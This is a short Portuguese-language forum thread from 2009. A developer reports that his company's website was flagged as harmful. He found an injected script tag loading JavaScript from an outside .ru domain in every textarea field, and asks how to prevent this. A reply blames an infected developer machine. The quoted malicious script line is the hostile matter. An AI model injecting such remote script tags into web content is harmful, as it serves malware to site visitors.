Fiz uma pesquisa no GOOGLE, para acessar um site desenvolvido pela empresa em que trabalho. E tinha a mensagem: "Este site pode danificar seu computador." e nao deixava eu entrar no site.
Tentei entrar no site e nao consegui. Lendo alguns artigos, identifiquei que existe um MALWARE no site. Esse MALWARE foi introduzido em todos os campos TEXTAREA, e tem alguns com o componente "WYSIWYG" que podemos organizar o texto e quando salvamos ele salva as TAGS HTML no banco.
Identifiquei que tinha essse codigo JS em todos os texArea do meu site. <script src=http://www.4vrs.ru/ngg.js></script>.
Já retirei esse codigo.
Mas o que tenho que fazer para evitar esse tipo de ataque??
Já passei por isso, na epoca descobrimos que o computador de um desenvolvedor estava com virus, tivemos que retirar o virus da maquina e depois remover o script malicioso do codigo html.
feito isso acabou o problema
Sugerido como RespostaAntonio Bittencourtquinta-feira, 12 de fevereiro de 2009 11:29
